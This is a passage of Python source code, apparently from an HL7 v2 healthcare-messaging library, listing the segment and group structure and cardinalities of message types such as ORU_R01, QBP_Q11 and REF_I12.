('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OMN_O07_PATIENT', GROUPS['OMN_O07_PATIENT'], (0, 1), 'GRP'),
('OMN_O07_ORDER', GROUPS['OMN_O07_ORDER'], (1, -1), 'GRP'),)),
'OMP_O09': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OMP_O09_PATIENT', GROUPS['OMP_O09_PATIENT'], (0, 1), 'GRP'),
('OMP_O09_ORDER', GROUPS['OMP_O09_ORDER'], (1, -1), 'GRP'),)),
'OMS_O05': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OMS_O05_PATIENT', GROUPS['OMS_O05_PATIENT'], (0, 1), 'GRP'),
('OMS_O05_ORDER', GROUPS['OMS_O05_ORDER'], (1, -1), 'GRP'),)),
'ORB_O28': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORB_O28_RESPONSE', GROUPS['ORB_O28_RESPONSE'], (0, 1), 'GRP'),)),
'ORD_O04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORD_O04_RESPONSE', GROUPS['ORD_O04_RESPONSE'], (0, 1), 'GRP'),)),
'ORF_R04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('ORF_R04_QUERY_RESPONSE', GROUPS['ORF_R04_QUERY_RESPONSE'], (1, -1), 'GRP'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'ORG_O20': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORG_O20_RESPONSE', GROUPS['ORG_O20_RESPONSE'], (0, 1), 'GRP'),)),
'ORI_O24': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORI_O24_RESPONSE', GROUPS['ORI_O24_RESPONSE'], (0, 1), 'GRP'),)),
'ORL_O22': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORL_O22_RESPONSE', GROUPS['ORL_O22_RESPONSE'], (0, 1), 'GRP'),)),
'ORL_O34': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORL_O34_RESPONSE', GROUPS['ORL_O34_RESPONSE'], (0, 1), 'GRP'),)),
'ORL_O36': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORL_O36_RESPONSE', GROUPS['ORL_O36_RESPONSE'], (0, 1), 'GRP'),)),
'ORM_O01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORM_O01_PATIENT', GROUPS['ORM_O01_PATIENT'], (0, 1), 'GRP'),
('ORM_O01_ORDER', GROUPS['ORM_O01_ORDER'], (1, -1), 'GRP'),)),
'ORN_O08': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORN_O08_RESPONSE', GROUPS['ORN_O08_RESPONSE'], (0, 1), 'GRP'),)),
'ORP_O10': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORP_O10_RESPONSE', GROUPS['ORP_O10_RESPONSE'], (0, 1), 'GRP'),)),
'ORR_O02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORR_O02_RESPONSE', GROUPS['ORR_O02_RESPONSE'], (0, 1), 'GRP'),)),
'ORS_O06': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORS_O06_RESPONSE', GROUPS['ORS_O06_RESPONSE'], (0, 1), 'GRP'),)),
'ORU_R01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('ORU_R01_PATIENT_RESULT', GROUPS['ORU_R01_PATIENT_RESULT'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'ORU_R30': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ORU_R30_VISIT', GROUPS['ORU_R30_VISIT'], (0, 1), 'GRP'),
('ORC', SEGMENTS['ORC'], (1, 1), 'SEG'),
('OBR', SEGMENTS['OBR'], (1, 1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORU_R30_TIMING_QTY', GROUPS['ORU_R30_TIMING_QTY'], (0, -1), 'GRP'),
('ORU_R30_OBSERVATION', GROUPS['ORU_R30_OBSERVATION'], (1, -1), 'GRP'),)),
'OSQ_Q06': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'OSR_Q06': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('OSR_Q06_RESPONSE', GROUPS['OSR_Q06_RESPONSE'], (0, 1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'OUL_R21': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, 1), 'SEG'),
('OUL_R21_PATIENT', GROUPS['OUL_R21_PATIENT'], (0, 1), 'GRP'),
('OUL_R21_VISIT', GROUPS['OUL_R21_VISIT'], (0, 1), 'GRP'),
('OUL_R21_ORDER_OBSERVATION', GROUPS['OUL_R21_ORDER_OBSERVATION'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'OUL_R22': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, 1), 'SEG'),
('OUL_R22_PATIENT', GROUPS['OUL_R22_PATIENT'], (0, 1), 'GRP'),
('OUL_R22_VISIT', GROUPS['OUL_R22_VISIT'], (0, 1), 'GRP'),
('OUL_R22_SPECIMEN', GROUPS['OUL_R22_SPECIMEN'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'OUL_R23': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, 1), 'SEG'),
('OUL_R23_PATIENT', GROUPS['OUL_R23_PATIENT'], (0, 1), 'GRP'),
('OUL_R23_VISIT', GROUPS['OUL_R23_VISIT'], (0, 1), 'GRP'),
('OUL_R23_SPECIMEN', GROUPS['OUL_R23_SPECIMEN'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'OUL_R24': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, 1), 'SEG'),
('OUL_R24_PATIENT', GROUPS['OUL_R24_PATIENT'], (0, 1), 'GRP'),
('OUL_R24_VISIT', GROUPS['OUL_R24_VISIT'], (0, 1), 'GRP'),
('OUL_R24_ORDER', GROUPS['OUL_R24_ORDER'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'PEX_P07': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('PEX_P07_VISIT', GROUPS['PEX_P07_VISIT'], (0, 1), 'GRP'),
('PEX_P07_EXPERIENCE', GROUPS['PEX_P07_EXPERIENCE'], (1, -1), 'GRP'),)),
'PGL_PC6': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PGL_PC6_PATIENT_VISIT', GROUPS['PGL_PC6_PATIENT_VISIT'], (0, 1), 'GRP'),
('PGL_PC6_GOAL', GROUPS['PGL_PC6_GOAL'], (1, -1), 'GRP'),)),
'PMU_B01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('STF', SEGMENTS['STF'], (1, 1), 'SEG'),
('PRA', SEGMENTS['PRA'], (0, -1), 'SEG'),
('ORG', SEGMENTS['ORG'], (0, -1), 'SEG'),
('AFF', SEGMENTS['AFF'], (0, -1), 'SEG'),
('LAN', SEGMENTS['LAN'], (0, -1), 'SEG'),
('EDU', SEGMENTS['EDU'], (0, -1), 'SEG'),
('CER', SEGMENTS['CER'], (0, -1), 'SEG'),)),
'PMU_B03': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('STF', SEGMENTS['STF'], (1, 1), 'SEG'),)),
'PMU_B04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('STF', SEGMENTS['STF'], (1, 1), 'SEG'),
('PRA', SEGMENTS['PRA'], (0, -1), 'SEG'),
('ORG', SEGMENTS['ORG'], (0, -1), 'SEG'),)),
'PMU_B07': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('STF', SEGMENTS['STF'], (1, 1), 'SEG'),
('PRA', SEGMENTS['PRA'], (0, 1), 'SEG'),
('PMU_B07_CERTIFICATE', GROUPS['PMU_B07_CERTIFICATE'], (0, -1), 'GRP'),)),
'PMU_B08': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('STF', SEGMENTS['STF'], (1, 1), 'SEG'),
('PRA', SEGMENTS['PRA'], (0, 1), 'SEG'),
('CER', SEGMENTS['CER'], (0, -1), 'SEG'),)),
'PPG_PCG': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PPG_PCG_PATIENT_VISIT', GROUPS['PPG_PCG_PATIENT_VISIT'], (0, 1), 'GRP'),
('PPG_PCG_PATHWAY', GROUPS['PPG_PCG_PATHWAY'], (1, -1), 'GRP'),)),
'PPP_PCB': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PPP_PCB_PATIENT_VISIT', GROUPS['PPP_PCB_PATIENT_VISIT'], (0, 1), 'GRP'),
('PPP_PCB_PATHWAY', GROUPS['PPP_PCB_PATHWAY'], (1, -1), 'GRP'),)),
'PPR_PC1': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PPR_PC1_PATIENT_VISIT', GROUPS['PPR_PC1_PATIENT_VISIT'], (0, 1), 'GRP'),
('PPR_PC1_PROBLEM', GROUPS['PPR_PC1_PROBLEM'], (1, -1), 'GRP'),)),
'PPT_PCL': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('PPT_PCL_PATIENT', GROUPS['PPT_PCL_PATIENT'], (1, -1), 'GRP'),)),
'PPV_PCA': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('PPV_PCA_PATIENT', GROUPS['PPV_PCA_PATIENT'], (1, -1), 'GRP'),)),
'PRR_PC5': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('PRR_PC5_PATIENT', GROUPS['PRR_PC5_PATIENT'], (1, -1), 'GRP'),)),
'PTR_PCF': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('PTR_PCF_PATIENT', GROUPS['PTR_PCF_PATIENT'], (1, -1), 'GRP'),)),
'QBP_K13': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('QBP_K13_ROW_DEFINITION', GROUPS['QBP_K13_ROW_DEFINITION'], (0, 1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'QBP_Q11': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'QBP_Q13': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RDF', SEGMENTS['RDF'], (0, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'QBP_Q15': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('ANYHL7SEGMENT', SEGMENTS['ANYHL7SEGMENT'], (0, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'QBP_Q21': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'QBP_Qnn': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RDF', SEGMENTS['RDF'], (0, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'QBP_Z73': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),)),
'QCK_Q02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),)),
'QCN_J01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QID', SEGMENTS['QID'], (1, 1), 'SEG'),)),
'QRY': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),)),
'QRY_A19': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),)),
'QRY_PC4': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),)),
'QRY_Q01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'QRY_Q02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'QRY_R02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (1, 1), 'SEG'),)),
'QSB_Q16': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'QVR_Q17': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('QVR_Q17_QBP', GROUPS['QVR_Q17_QBP'], (0, 1), 'GRP'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RAR_RAR': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('RAR_RAR_DEFINITION', GROUPS['RAR_RAR_DEFINITION'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RAS_O17': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('RAS_O17_PATIENT', GROUPS['RAS_O17_PATIENT'], (0, 1), 'GRP'),
('RAS_O17_ORDER', GROUPS['RAS_O17_ORDER'], (1, -1), 'GRP'),)),
'RCI_I05': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('RCI_I05_PROVIDER', GROUPS['RCI_I05_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('RCI_I05_OBSERVATION', GROUPS['RCI_I05_OBSERVATION'], (0, -1), 'GRP'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),)),
'RCL_I06': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('RCL_I06_PROVIDER', GROUPS['RCL_I06_PROVIDER'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('DSP', SEGMENTS['DSP'], (0, -1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RDE_O11': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('RDE_O11_PATIENT', GROUPS['RDE_O11_PATIENT'], (0, 1), 'GRP'),
('RDE_O11_ORDER', GROUPS['RDE_O11_ORDER'], (1, -1), 'GRP'),)),
'RDR_RDR': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('RDR_RDR_DEFINITION', GROUPS['RDR_RDR_DEFINITION'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'RDS_O13': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('RDS_O13_PATIENT', GROUPS['RDS_O13_PATIENT'], (0, 1), 'GRP'),
('RDS_O13_ORDER', GROUPS['RDS_O13_ORDER'], (1, -1), 'GRP'),)),
'RDY_K15': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('DSP', SEGMENTS['DSP'], (0, -1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'REF_I12': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('RF1', SEGMENTS['RF1'], (0, 1), 'SEG'),
('REF_I12_AUTHORIZATION_CONTACT', GROUPS['REF_I12_AUTHORIZATION_CONTACT'], (0, 1), 'GRP'),
('REF_I12_PROVIDER_CONTACT', GROUPS['REF_I12_PROVIDER_CONTACT'], (1, -1), 'GRP'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('REF_I12_INSURANCE', GROUPS['REF_I12_INSURANCE'], (0, -1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
